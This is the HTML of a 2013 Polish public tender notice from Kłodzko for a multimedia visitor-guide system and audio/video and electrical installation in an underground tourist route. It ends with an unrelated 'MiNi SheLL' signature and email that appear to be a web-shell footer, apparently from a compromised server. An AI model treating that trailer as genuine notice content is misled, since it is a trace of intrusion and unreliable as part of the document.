<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez  
                  zamawiającego w SIWZ (zgodnie z art. 25 ust. 1 pkt 2 Ustawy PZP i wyszczególnione w § 5  Rozporządzenia   
                  Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów jakich może żądać 
                  zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009r. Nr 226, 
                  poz. 1817), Zamawiający żąda dostarczenia wraz z ofertą jako załącznika: 
                 cz. I - Wykonawca dostarczy na nośniku danych elektronicznych min. 1 próbkę zrealizowanych animacji 3D.  
                cz.  I i II - karty katalogowe specyfikacje techniczne dostarczanych urządzeń, zgodnie z zał. 9</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne wymagane dokumenty wspólne dla wszystkich części zamówienia:Wypełnione formularze stanowiące załączniki do SIWZ.Zaakceptowany projekt umowy. Projekt umowy musi zostać zaakceptowany bez dokonywania w nim jakichkolwiek zmian - Załącznik Nr 6. Do oferty należy dołączyć jako załącznik kosztorys ofertowy. Kosztorys ten nie będzie podlegał ocenie na etapie wyboru Wykonawcy, dotyczy tylko II części zamówienia.W przypadku kiedy Wykonawcę reperezentuje pełnomocnik, wszelkie pełnomocnictwa uprawniające do reprezentacji winny być złożone w formie oryginału i podpisane przez osoby uprawnione do reprezentacji Wykonawcy. W przypadku złożenia kserokopii, pełnomocnictwo musi być potwierdzone notarialnie.  Treść pełnomocnictwa powinna zawierać jego zakres oraz określać do jakiego Zamówienia publicznego zostało ono złożone.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zostały przewidziane w projektach umów stanowiących załączniki do siwz oraz SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.klodzko.pl zakładka Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kłodzku pl. Bolesława Chrobrego 1, 57-300 Kłodzko pok.231 godziny pracy urzędu 7.30-15.30 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 09:00, miejsce: Urząd Miasta w Kłodzku
pl. Bolesława Chrobrego 1, 
57-300 Kłodzko
pok. 101 Biuro Obsługi Ludności 
godziny pracy urzędu 7.30-15.30 od poniedziałku do piątku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cz. I Dostawa Wyposażenia - System oprowadzania turystów. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cz. I Dostawa Wyposażenia - System oprowadzania turystów. Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do dostawy i montażu nowoczesnego, interaktywnego systemu oprowadzania turystów wykorzystujący najnowsze technologie, a także przygotowania treści multimedialnych (filmy, grafika, animacje, dźwięk) zgodnie ze Scenariuszem ekspozycji oraz koncepcją aranżacji plastycznej Podziemnej Trasy Turystycznej im. Tysiąclecia Państwa Polskiego w Kłodzku będącym załącznikiem do niniejszej specyfikacji). 

Uwaga! Wszystkie urządzenia elektryczne zaproponowane do trasy powinny być zabezpieczone przed trudnymi warunkami w Podziemnej Trasie Turystycznej duży poziom wilgoci.

Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cz. II Prace instalacyjne-instalacja systemu audio-wideo
w Podziemnej Trasie Turystycznej, ul. Zawiszy Czarnego 3, 57-300 Kłodzko..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem II części zamówienia jest:  
1.1 Budowa systemu nagłośnienia Podziemnej Trasy Turystycznej wraz z wydzielonym zasilaniem elektrycznym, ul. Zawiszy Czarnego 3, 57-300 Kłodzko.  
1.2 Budowa systemu zasilania urządzeń multimedialnych Podziemnej Trasy Turystycznej wraz z wydzielonym  zasilaniem elektrycznym, ul. Zawiszy Czarnego 3, 57-300 Kłodzko.  
1.3 Roboty budowlane: malowanie pomieszczeń, montaż kraty po uprzednim wykonaniu projektu szkicu  i uzgodnieniu go z konserwatorem zabytków w Wałbrzychu.

2.1 SYSTEM  NAGŁOŚNIENIA:
Zaprojektowano instalacje nagłośnienia poszczególnych sal oraz korytarza podziemnej trasy turystycznej. W poszczególnych salach zainstalowano po 2 sztuki głośników projektorowych 10W 100V tj. 20 szt. Na korytarzu podziemnej trasy turystycznej zainstalowano 49 głośników standardowych o mocy 6W i napięciu zasilania 100V oraz dodatkowe głośniki przy wejściu, wyjściu z Podziemnej Trasy Turystycznej Twierdzy Kłodzkiej oraz w kasie biletowej. Do zasilania głośników projektorowych należy ułożyć przewód YKY 0,6/1 kV 3*2,5mm2., natomiast do zasilania głośników standardowych rozmieszczonych wzdłuż trasy turystycznej należy ułożyć przewód YLY 0,6/1 kV 2*16mm2. Z centralnej szafy nagłośnienia należy zasilić przewodem YKY 0,6/1kV 3*2,5mm2 pulpit mikrofonowy 1- strefowy umieszczony w kasie biletowej przy wejściu i wyjściu z podziemnej trasy turystycznej. Należy doprowadzić z końcowego punktu dystrybucyjnego KPD do pulpitu mikrofonowego znajdującego się przy wyjściu z trasy turystycznej przewód UTP skrętka komputerowa zewnętrzna, ekranowana kategorii 5e żelowana CU 8 żyłowa. Ułożony przewód należy zakończyć wtykiem RJ45.
Zaprojektowany system urządzeń do nagłośnienia sal oraz trasy turystycznej wraz z systemem video sterowanym z umieszczonych na parterze przy wejściu do kas biletowych szaf rackowych 19 42U wyposażonych w system wentylacji oraz system oświetlenia. Szafy należy  ustawić na cokołach o wysokości 200mm. Drzwi szafy wyposażyć w zamki patentowe.  Obudowy szaf należy połączyć z szyną wyrównawczą. Szafa wykonana ze stali, malowana proszkowo. Szafa standardowo wyposażona w ściany boczne oraz drzwi tylne i frontowe. W szafie istnieje możliwość demontażu ścian bocznych, które mocowane są na zamki patentowe.

2.2 SYSTEM  MULTIMEDIALNY
Zaprojektowany system urządzeń do projekcji obrazu sal oraz trasy turystycznej wraz z systemem podglądu obrazu sterowanym z umieszczonej na parterze przy wejściu do kas biletowych szafy rackowej 19 42U wyposażonej w system wentylacji oraz system oświetlenia. Szafę należy ustawić na cokole o wysokości 200mm. Drzwi szafy wyposażyć 
w zamek patentowy. Obudowę szafy należy połączyć z szyną wyrównawczą. Szafa wykonana ze stali, malowana proszkowo. Szafa standardowo wyposażona w ściany boczne oraz drzwi tylne i frontowe. W szafie istnieje możliwość demontażu ścian bocznych, które mocowane są na zamki patentowe.

2.3 INSTALACJA ELEKTRYCZNA

Obiekt zasilić wewnętrzną linią zasilającą w.l.z   z istniejącej rozdzielnicy n.n- linią YKY 5x 25mm kw. rozdzielnicę główną R w pomieszczeniach wystawowo - konferencyjnych Z R zasilić  instalację odbiorczą poprzez rozdzielnicę: R1 pomieszczenie regimentu.

2.4. Zaleca się, aby każdy Wykonawca zapoznał się z terenem budowy celem uzyskania dodatkowych informacji
przydatnych do wyceny prac i złożenia oferty, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego
skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Podstawą wykonania zadania jest
dokumentacja projektowa. 
2.5. Prace będące przedmiotem zamówienia zostaną wykonane na podstawie szczegółowych uzgodnień. Wykonawcy
zobowiązani są użyć do wykonania zamówienia urządzeń i materiałów odpowiadających wymaganiom Normy oraz
innym określonym w specyfikacji technicznej wykonania i odbioru robót budowlanych i dokumentacji projektowej.
Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty zezwalające na ich stosowanie w budownictwie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości).

2.6.  Przedstawione w SIWZ urządzenia techniczne, wyroby i materiały należy traktować jako przykładowe. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w SIWZ pod warunkiem zapewnienia parametrów  nie gorszych niż określone w specyfikacji, zapewniające efekt założony przez Zamawiającego (techniczny, ekonomiczny, ekologiczny). Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać spełnienie wymagań określonych przez Zamawiającego.

2.7. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom zgodnie z art. 36 ust. 4 Pzp (zgodnie z załączonym wzorem zał. Nr 11). W przypadku, gdy Wykonawca wykonuje przedmiot zamówienia przy pomocy podwykonawcy, Wykonawca otrzyma wynagrodzenie za wykonanie zamówienia po przedstawieniu Zamawiającemu dokumentów (np. oświadczeń) świadczących o rozliczeniu się Wykonawcy z podwykonawcą.

2.8.  W celu wykonania swoich obowiązków w zakresie objętym proponowaną ceną ofertową Wykonawca zobowiązuje się do: 
1.	wykonania robót budowlanych zgodnie z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, innymi warunkami narzuconymi przez inwestora z obowiązującymi przepisami, normami, sztuką budowlaną, 
2.	zapewnienia i przeprowadzenia prób, sprawdzeń i rozruchu instalacji, 
3.	użycia materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót budowlanych,
4.	zapewnienia kierownictwa i nadzoru nad realizowanym przedmiotem umowy,
5.	organizacji i utrzymania zaplecza niezbędnego dla realizowanego przedmiotu umowy,
6.	uporządkowania terenu budowy po zakończeniu robót i przekazania go w terminie ustalonym dla odbioru końcowego,
7.	wykonania zabezpieczenia budowy i pomieszczeń oraz ich ochrony w okresie realizacji umowy, aż do dnia przekazania wykonanego przedmiotu umowy Zamawiającemu,
8.	odpowiedniego oznakowania terenu budowy; 
9.	ponoszenia kosztów dostawy dla potrzeb realizacji przedmiotu umowy: energii elektrycznej, energii cieplnej, wody,
10.	organizacji siły roboczej i pracy niezbędnych specjalistów wraz z nadzorem bezpośrednim nad robotami,
11.	zapewnienia pracy sprzętu budowlano-montażowego i środków transportu,
12.	zapewnienia właściwych warunków składowania materiałów oraz ich ochronę,
13.	zabezpieczenia terenu robót i pomieszczeń przed dostępem osób trzecich w sposób zapewniający bezpieczne ich prowadzenie, 
14.	realizacji robót w sposób nie powodujący szkód, w tym zagrożenia ludzi i mienia Zamawiającego.
Przedmiot zamówienia szczegółowo opisuje projekt budowlany, specyfikacja techniczna wykonania i odbioru robót oraz dodatkowe wymagania narzucone przez Inwestora w siwz.

1. Dodatkowe wymagania:
1. Rozruch systemu, bezpłatne przeszkolenie pracowników wskazanych przez Zamawiającego w zakresie eksploatacji systemu.  
2. Montaż urządzeń takich jak: głośniki, oprawy oświetleniowe itp. na podkładkach dystansowych grubości 5 mm wykonanych z gumy.
3. Po wykonaniu przedmiotu zlecenia obiekty Podziemnej Trasy Turystycznej w której prowadzone były prace muszą być wysprzątane, gotowe na przyjęcie turystów.
4. Opis przedmiotu zamówienia zawarty jest w: projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót oraz wymaganiach dodatkowych.

Uwagi:
Przedmiar robót ma wyłącznie charakter pomocniczy do opracowania oferty - kosztorysu ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0, 32.34.24.00-6, 45.31.56.00-4, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com